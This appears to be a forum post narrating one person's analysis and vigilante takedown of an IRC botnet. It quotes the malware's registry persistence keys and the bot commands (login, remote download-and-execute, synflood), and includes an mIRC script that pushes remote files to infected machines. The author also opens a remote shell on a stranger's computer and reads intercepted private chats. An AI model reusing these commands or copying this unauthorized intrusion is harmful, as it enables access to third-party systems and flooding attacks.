Spontaneous intro in 3...2...1....START
A lot of people come to Suck-o and think that they will get awesome hacker tools to destroy the <insert country here> government, but we don't work like that. We'll teach you how to use a gun to defend yourself and hunt for food, if you use it to kill pedestrians is up to you, and we won't supply you with any heat seeking missiles.
There are a lot of stupid people on this wide area network we like to call the Internet, be it 12 year old kids with “Push this shiny button to hack!” applications, or be it seriously skilled software engineers that simply doesn't care about what's ethical , they just want to earn money or test their malware on innocent bystanders.
The first lot of people are the ones we call “script kiddies”, and the second party is the “black hats”. Common people label both parties as “hackers”. We, are the gray hats and the white hats, and some people tend to connect us with “guys who know how to use MS Word and write some harmless code”. We know how to do as much damage as the so called “black hats” with the same techniques as they use, we simply choose not to, because it's not right. If we took the same actions as they did, then what of balance? What would happen to this already damaged world of machines?
The “bad guys” build malware to either make money or to just fuck shit up, and we create solutions to stop them (yes, we are the good guys). Most people know this only as “Anti Virus”, “Fire walls” and “other really cool protective solutions with shiny buttons and automatic updates”.
But …
Do we do naughty things from time to time? Of course we do!
If we were to wait for people to call for support to fix their computer, thus eliminating a tiny bit of a botnet, then that would be a great step towards total collapse.
I personally love to play with everything “malware”, and the thing that keeps the black hat off is the fact that I never use any of these tools to do any kind of harm to innocent peoples machines, at least I never intend to.
So, to give you all an example of how we like to do things, or just “pass time on a Friday night”, my story starts … now.
…
A friend of mine told me during a lecture, that he had been “hacked”, and seeing as he is also a software engineer I found this hard to believe, but upon inspecting his laptop, it was true. How he got the malware is still unknown, but it is assumed that he clicked something that he shouldn't had.
The first binary that I got my hands on, was called “db.exe” and was downloaded from the domain secure.valid.cc. When visiting the page it looks more like a company website, which was weird, but I didn't look more into that since it was irrelevant so far. The program (db.exe) connected to an IRC server (irc.cyberdelia.nu), but at my friends computer, without any tools, that was all that I could see (netstat). There were some channels on the server, but only one thing that was interesting. There was a topic that was named “.download hxxp://secure.valid.cc/secure.exe C\winwdm.exe 1”, which gave me the impression that the “db.exe” file downloaded this file when it joined the server or channel. We checked the root of C:\ and voila, there the file was.
When I got home he had mailed the files to me and the information that we had gotten from his laptop. So I prepared my analysis by doing the following:
*I created a new virtual machine with VirtualBox where I installed Windows XP SP1
*On the virtual machine I installed Tor (proxy), Proxyfier (forces applications through proxy), Nmap (scan and analyze nodes/hosts), wireshark (sniff packets / monitor traffic), virustotal.com (quick scan of files / virus scan), Anubis (site to analyze files deeper)
*I then downloaded the “secure.exe” from the server that was mentioned in the topic on the suspicious IRC server, and ran it.
*I booted up another virtual machine with Linux (Ubuntu 9.10) on it, where I already had the same set of tools installed, I started xchat (IRC client) on it and joined the server.
I started by running wireshark and monitoring the info that was sent and received to and from the malware tI hahat d just run on the Windows computer. The malware first copied itself to C:\Windows\System32\svchosts.exe and made itself a hidden and protected system file. It then added itself to
Code: Select all
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MS USC"=”svchosts.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"MS USC"=”svchosts.exe”
After this, it connected to the IRC server at irc.cyberdelia.nu, and the first interesting thing that I noticed in wireshark, was that it joined a hidden channel called “#ftw”. And it had a nickname like “SWE|53135”, and it doesn't take much thinking to get that this is a special nickname pattern that the malware uses. The pattern is simply
SWE → Country
53135 → Random ID
so <country>|<ID>!<random name>@ip
I continued to monitor the malware with wireshark.
I connected to the server using xchat with tor and joined the channel #ftw, and the channel was filled with users using that same nickname pattern, I had stumbled over a minor botnet (to the batmobile!).
The channel was spammed with new bots joining and quitting, when they joined they instantly read a command from the topic that said “.download hxxp://secure.valid.cc/secure.exe C:\windwm.exe 1”, they then sent everything they were doing, to the channel.
* SWE|12325 (~yzohnrq@ce10618-svalov.cenara.com) has joined #ftw
<SWE|12325> (FTW) NEDLADDNiNG - URL: hxxp://update.mastercard.name/secure.exe to: C:\windwm.exe.
<SWE|12325> [DOWNLOAD]: Downloaded 69.0 KB to C:\windwm.exe @ 34.5 KB/sec.
<SWE|12325> [DOWNLOAD]: Opened: C:\windwm.exe.
For some time I simply monitored the activity of the bots and read the data from wireshark.
They didn't seem to be doing anything, so I let it be.
I mentioned this to bad_brain, and he suggested that I should report it to shadowserver.org, and that sounded like a good idea, after I was done with it, that is.
While monitoring traffic, I noticed something not so good.
Response: :SWE|38660!~ilnrydz@83.**.23.** PRIVMSG #ftw :[KEYLOG]: snacka om de <( (Return) (Johanna <h****_@hotmail.com>)
Someones private IM chat it would seem.
Lucky me it had an email address included!
The message in the packet was in Swedish, with a hotmail address so I assumed it was from MSN Messenger. So I added this strange address to my own MSN buddy list, and after a few minutes, it got accepted.
The beginning of the conversation started like this (translated to English of course):
….her response to my explanation was “hah, interesting”, which was a relief.(7:17:50 PM) cats: God you're slow
(7:18:06 PM) h***_@hotmail.com: Who are you? :S
(7:18:22 PM) cats: hah sorry. A little weird me adding you like this =)
(7:18:31 PM) cats: okey... this is going to sound a little strange, so be open
(7:18:34 PM) h***_@hotmail.com: haha
She didn't trust me though, and every attempt to help her clean her computer was met with “how do I know you aren't hacking my computer now?”
Well, technically it was already hacked, but she was right. What the hell was I thinking adding a random person like that and tell them to trust me? Anyway, we talked for a little while and she turned out to be a nice person. It also turned out that she wasn't infected, since she trusted me enough to check if some files were present. Apparently the person she was talking to, was the one infected, it was his conversation I had scooped up while sniffing traffic. Anyway he wasn't online so I didn't bother, and I made a new E-friend in the process of trying so ^_^.
I continued to check the traffic, and saw a lot of disturbing things, like a man logging in to his bank account, and someone checking their facebook. All unaware of someone watching their every mouse click.
I decided that this had to stop, as fast as possible.
After a little while, the owner of the botnet logged in, he went by the name “mrb” and didn't notice that one of his bots were not going to do as told (me). Lucky me, he started to send commands to the bots, and in particular one very special command, the “.login” command, with the password included, in clear text in the wide open. I saved the data and continued to watch as he played with his bots.
I used the information that I had gathered to google for more commands. The results weren't that surprising actually. I found a whole list of commands, with bot binary included. I sent the login command to a bot in a private chat, to which it replied “Password accepted.”, I then tried some harmless commands from the list, like .netinfo and .sysinfo to show some information about the infected system in the private chat.
With the .version command, I got the following
[02:03] <USA|54125> (FTW): ftw v0.1 by delaCrew 2010 – PriV8
so, it was a script kiddie doing, as in he probably downloaded the bot from some site, modified it and used it for his own destructive purposes.
I took a chance, and issued the .login command in the channel, which made all the bots spam “Password accepted.”, and then, I wrote “.remove”, which according to the description would remove the bot completely. After a little while, the owner yelled at another user in the channel (nickname n30), he went nuts, and I got noticed, since I was the only bot left in the channel, and I didn't answer to any commands (I tried, but I wasn't fast enough for him to be fooled). I got banned and was thrown out.
I wasn't done with it yet though.
I started proxyfier on the Windows machine and ran the malware binary again, forcing it through a proxy so that it could rejoin the server again unnoticed, I then rejoined with another proxy on the xchat client on the other virtual machine, but only to get the message “channel requires keyword”. This was handled fast though, since the bot could enter the channel, I restarted the malware binary and checked the packets to get the keyword (thank God for clear text).
I joined the #ftw channel yet again only to see that almost all bots had joined again, so either it was a bug with the .remove command, or he had modified it to not work so that people couldn't do like I did. He noticed me again, but instantly this time, since I used a domain that ended with “tor privacy”-something. So, we started to talk, and I first said that I only wanted to ask him a few things about the botnet, and if he had written it himself and so on.
I got nothing good out of him (he was Swedish btw), he avoided questions and talked gibberish. I got the direct impression that he was a retard. After a rather long talk, which is no use translating since it was all bullshit, he asked me nicely to leave his network, which I did with the request that he would stop infecting innocent peoples machines, and keep it to himself if he wanted to play with it.
He agreed, and I left.
I didn't think he would keep his word, but I wanted all the bots to have time to join again so that I could make up a better plan to get rid of them all in one action.
The solution, was this mIRC script that I wrote
Code: Select all
on 1:JOIN:#: {
if ($regex($nick, /[A-Z]{3}\|[0-9]{5}/)) {
/msg $nick .login pass
/msg $nick .netinfo
/msg $nick .download hxxp://teresa.binarykitten.com/kill.reg C:\kill.reg 0
/msg $nick .download hxxp://teresa.binarykitten.com/kill.bat C:\kill.bat 1
/
}
}
It's very simple. When a user joins that follows the regex pattern (a bot), my client neatly spoofed as a bot this time with another proxy (didn't use tor this time since it was inconvenient) would login to the bot that just joined the channel, tell it to send me its netinfo (IP and such might be useful later), then download two files, kill.bat and kill.reg, it was told to execute kill.bat when it had downloaded it. And this small batch script would simply kill all malware processes, remove their registry keys with kill.reg, and remove the files from the computer, which was an effective way!
I told the other bots to reconnect so that they would trigger the script as well (mrb didn't notice in all that spam of bit joining/reporting, and luckily he didn't seem to be present). I went to bed, and let the script do the dirty work.
When I woke up, it was still killing bots that was joining (imagine how large this botnet could have been by then). I went down to the University thinking that it would handle it, unfortunately Mr.mrb noticed it 20 minutes later, and I didn't get home until very late, and by that time he had banned me and kicked me out, and to make it all harder, he had set the channel to “invites only”, and I didn't know if this applied to the bots as well. I connected to the server with another proxy, and did /user, that would tell me how many users were online, and I knew that only about 13 users on that server were “real”. The command gave me 90, which was enough bots to be able to cause some damage. I had some logs from the night before, with a bunch of bot names, so I picked the one that was the latest referenced in the timestamps, sent it the login info, and it responded as I had hoped. Now I wanted to get into the channel again and continue my bot killing. One of the commands of the bot, was a remote shell, which was naughty, but very useful in my case, since I needed an updated binary (or so I thought). I used the remote shell to gain access to the victims computer and to try to grab the updated file, but when I had connected, I noticed something in the root of C:\ … it was my “kill.bat” (not the kill.reg since kill.bat removes it when done). I checked the script, and it was fine and should have worked, but obviously it failed, so I checked all the commands it used. And one very important command didn't work, the “taskkill” command, and it turned out that the mrb guy had removed that file on as many bots as he could, rendering my little fix pretty useless.
Anyway, so I grabbed the updated file, but I discovered that the status was same with that one, and I still couldn't connect. I noticed that the user count on the server was dropping pretty fast, and this was most likely because the bots couldn't join, which I also noticed on the responses from the server when I issued any commands to it “The server is very busy right now, wait and try again later”. This gave me an idea. I had one of the bots at my command, and it had a lot of commands built in since it was a “release to the skiddies” kind of bot. So, I made it send a message to the #ftw channel
.login pass
.synflood <address to the IRC server> <port> <seconds>
The idea was that all the bots would flood the IRC server and made everything go boom, but apparently something went wrong and it didn't succeed. The flood ended the second it started, which makes me suspect that they had some kind of fail safe that would make sure that they bots didn't flood the server they were connected to (pretty smart actually to think about that, maybe they had a problem in the beta release where idiots destroyed themselves, can't have customers killing themselves, right?). After this failed operation the bot disconnected, and as predicted it couldn't rejoin.
I was left with no more options. I reported the botnet to shadowserver.org and bad_brain sent a mail to the guys host to get it shutdown.
I am still monitoring the server, and the user count is dropping each 30 minutes or so, thus slowly killing the botnet. The owner of the botnet has been pushed into a corner and can't do anything else but letting the channel be locked since opening it would let me and others in again to foil his plans.
This however, does not mean I give up, hell no. I'll continue as long as I suspect that server to control such an amount of malware bots, that it could mean danger to any other machine (superman pose). I am at this moment running a script that bruteforces the botnames on the server, in hopes that I will find an active one that I can use to try and destroy the botnet once again from the inside.
I thought about all the computers that I saved from being his slaves when running my script over night, and it made me feel good about myself, using the “blackhats” own warfare, against them. The good deed of the day, even if they will never know
For those interested in the bot commands and info about it ...
From this forum
Code: Select all
http://www.viprasys.org/vb/f75/botnet-rxbot-commands-267828/
i think you should be the members of the month 
